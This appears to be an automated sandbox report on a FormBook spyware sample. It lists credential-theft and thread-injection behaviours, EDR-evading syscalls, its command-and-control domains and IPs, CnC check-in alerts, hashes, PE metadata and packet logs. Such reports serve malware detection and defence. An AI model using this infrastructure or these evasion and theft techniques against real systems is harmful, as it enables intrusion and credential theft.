                Pp7OXMFwqhXKx5Y.exe (second instance): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection); Found direct / indirect Syscall (likely to bypass EDR)
                RAVCpl64.exe: www.brickhills.site 103.224.182.242, 49788, 49789, 49790 TRELLIAN-AS-APTrellianPtyLimitedAU Australia; 0be.info 173.0.157.187, 49796, 49797, 49798 SERVERS-COMUS United States; 13 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR)
                cacls.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures

                Source | Detection | Scanner | Label | Link
                Pp7OXMFwqhXKx5Y.exe | 100% | Joe Sandbox ML | |
                Pp7OXMFwqhXKx5Y.exe | 45% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                88rtp.biz
                172.96.191.39
                truetrue
                  unknown
                  www.eichner.pro
                  89.31.143.90
                  truetrue
                    unknown
                    www.goldbracelet.top
                    172.67.201.49
                    truetrue
                      unknown
                      www.224466.top
                      45.197.47.177
                      truetrue
                        unknown
                        0be.info
                        173.0.157.187
                        truetrue
                          unknown
                          www.smartgov.shop
                          13.248.169.48
                          truetrue
                            unknown
                            www.juewucangku.xyz
                            8.136.96.106
                            truetrue
                              unknown
                              www.brickhills.site
                              103.224.182.242
                              truetrue
                                unknown
                                hayaniya.org
                                192.185.147.100
                                truetrue
                                  unknown
                                  www.kubex.dev
                                  217.160.0.183
                                  truetrue
                                    unknown
                                    www.epicurecooks.world
                                    208.91.197.27
                                    truetrue
                                      unknown
                                      nng83.top
                                      38.47.233.4
                                      truetrue
                                        unknown
                                        www.dialogpriest.online
                                        176.31.209.107
                                        truetrue
                                          unknown
                                          sido247.pro
                                          84.32.84.32
                                          truetrue
                                            unknown
                                            www.glowups.life
                                            209.74.79.42
                                            truetrue
                                              unknown
                                              www.0be.info
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.foggvdqutxzgea.xyz
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.sido247.pro
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.88rtp.biz
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.nng83.top
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.hayaniya.org
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          NameMaliciousAntivirus DetectionReputation
Name    Source    Malicious    Antivirus Detection    Reputation
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.wesped.com/cart.php?a=add&domain=registerRAVCpl64.exe, 00000003.00000002.183800347636.0000000008510000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000005720000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhRAVCpl64.exe, 00000003.00000002.183800347636.0000000007880000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000004A90000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3RAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://localhost/arkanoid_server/requests.phpRAVCpl64.exe, 00000003.00000002.183800347636.0000000006B2C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.0000000003D3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.179519526215.0000000023C6C000.00000004.80000000.00040000.00000000.sdmp, Pp7OXMFwqhXKx5Y.exefalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://gemini.google.com/app?q=cacls.exe, 00000004.00000002.182792565138.00000000081CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixRAVCpl64.exe, 00000003.00000002.183800347636.000000000755C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000004.00000002.182792439928.0000000006720000.00000004.00000800.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182791208626.000000000476C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567413
Start date and time: 2024-12-03 14:48:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Pp7OXMFwqhXKx5Y.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@17/15
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 83
• Number of non-executed functions: 252
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Pp7OXMFwqhXKx5Y.exe
Time | Type | Description
08:51:51 | API Interceptor | 28430839x Sleep call for process: cacls.exe modified
                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                                Entropy (8bit):5.354384827676232
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:MLUE4K5E4K1Bs1qE4qXKDE4KhKMaKhPKIE4oKnKoZAE4KzD1E4x84j:MIHK5HK1Bs1qHiYHKh6oPtHoAhAHKzhp
                                                                                                                                                                                                                                MD5:511475387A5161D4052316C38F7FF282
                                                                                                                                                                                                                                SHA1:2CE71F7A372D6965DD42B71EEC5E8F81D43343B3
                                                                                                                                                                                                                                SHA-256:AD084A10414740C5054EDBCF76007E75F9E7456D3C7C5DA8865F0ECD491A6E61
                                                                                                                                                                                                                                SHA-512:E60E0218C46DF20260D81B7A1FBD69BF019C54E36A8ACDB74ADAB91A90BD8960ECC8E16F3872851119DA05E72787433DD3C54E099F9E6526342E05C38D5364C7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):135168
                                                                                                                                                                                                                                Entropy (8bit):1.1142956103012707
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                                                                                                MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                                                                                                SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                                                                                                SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                                                                                                SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):7.805893321028564
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                File name:Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                File size:766'976 bytes
                                                                                                                                                                                                                                MD5:8a6f66334502bc3da28732ccd4353d14
                                                                                                                                                                                                                                SHA1:f51ecc0c41835d9aed80c16a8a7121ca08f9476a
                                                                                                                                                                                                                                SHA256:f6047e5b6850d495f6abb0be606099be170b94fcef640a52681490020a569bf6
                                                                                                                                                                                                                                SHA512:c58b2678afd98b6f940ee670def962b62f27bda28d0613045c5f12007e87ade470d565124ce78c417a13dc193e309ba096535217346b2603b9a2d391d87c8eb7
                                                                                                                                                                                                                                SSDEEP:12288:nxIR4R52J+XtHzP6IjvfsBpbLnvyxPNmRS8Ijn2PYI6OvnKZz0j0qqkEQjAFiIRi:xIeeqCsupbLDRS8unkYeKZ20qqkjiiI4
                                                                                                                                                                                                                                TLSH:F8F4125D5A5AE40BCE0017780EB2F2B81AAC1FDDB901D2179FDDADEBB876C241D482C1
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0..\...T......Zz... ........@.. ....................................@................................
                                                                                                                                                                                                                                Icon Hash:033424c4c199d839
                                                                                                                                                                                                                                Entrypoint:0x4b7a5a
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x674E950D [Tue Dec 3 05:20:13 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7a08 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x4ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb5a60 | 0xb5c00 | b4d6a9528d41deef0775470d8ec29227 | False | 0.9391549174690509 | data | 7.815154891038661 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x4ca8 | 0x5000 | 027a0c305e4aa7294aec5d4c02bb0c79 | False | 0.91767578125 | data | 7.6671485249994555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x400 | 815d6534af5a99a588549af407f7c516 | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb8100 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9932852661126094
RT_GROUP_ICON | 0xbc80c | 0x14 | data |  |  | 1.05
RT_VERSION | 0xbc830 | 0x278 | data |  |  | 0.4699367088607595
RT_MANIFEST | 0xbcab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                                                                                                2024-12-03T14:53:24.700544+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049788103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:27.401782+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049789103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:30.117901+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049790103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:32.806121+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049791103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:53:46.363729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049792172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:48.988647+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049793172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:51.624752+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049794172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:54.362645+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049795172.67.201.4980TCP
                                                                                                                                                                                                                                2024-12-03T14:53:59.878230+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049796173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:02.514484+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049797173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:05.199744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049798173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:07.869169+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049799173.0.157.18780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:13.225774+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980013.248.169.4880TCP
                                                                                                                                                                                                                                2024-12-03T14:54:15.860993+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980113.248.169.4880TCP
                                                                                                                                                                                                                                2024-12-03T14:54:21.142002+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980313.248.169.4880TCP
                                                                                                                                                                                                                                2024-12-03T14:54:26.872473+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049804192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:29.582363+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:32.164731+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049806192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:34.635788+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049807192.185.147.10080TCP
                                                                                                                                                                                                                                2024-12-03T14:54:40.809851+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049808176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:43.031819+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:45.758627+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049810176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:48.464695+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049811176.31.209.10780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:54.702361+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981245.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:54:57.557088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981345.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:55:00.395570+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981445.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:55:03.241493+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981545.197.47.17780TCP
                                                                                                                                                                                                                                2024-12-03T14:55:12.635345+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049816172.96.191.3980TCP
                                                                                                                                                                                                                                2024-12-03T14:55:18.049773+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049817217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:20.759489+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049818217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:23.500208+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049819217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:26.191249+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049820217.160.0.18380TCP
                                                                                                                                                                                                                                2024-12-03T14:55:39.823002+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204982484.32.84.3280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:45.177141+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049825209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:47.878778+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049826209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:50.586735+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049827209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:55:53.283542+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049828209.74.79.4280TCP
                                                                                                                                                                                                                                2024-12-03T14:56:07.112706+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049832208.91.197.2780TCP
                                                                                                                                                                                                                                2024-12-03T14:56:12.795428+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983389.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:15.527591+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983489.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:18.262666+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983589.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:20.978871+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983689.31.143.9080TCP
                                                                                                                                                                                                                                2024-12-03T14:56:26.752606+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498378.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:30.246380+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498388.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:32.490783+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498398.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:35.326608+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498408.136.96.10680TCP
                                                                                                                                                                                                                                2024-12-03T14:56:40.981355+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984138.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:43.821642+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984238.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:46.666769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204984338.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:49.508113+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204984438.47.233.480TCP
                                                                                                                                                                                                                                2024-12-03T14:56:54.891535+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049845103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:56:57.592625+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049846103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:57:00.284482+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049847103.224.182.24280TCP
                                                                                                                                                                                                                                2024-12-03T14:57:02.993916+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049848103.224.182.24280TCP
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.180924892 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.183054924 CET4976380192.168.11.20217.160.0.183
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.369575977 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.376332045 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.376877069 CET8049763217.160.0.183192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.377168894 CET4976380192.168.11.20217.160.0.183
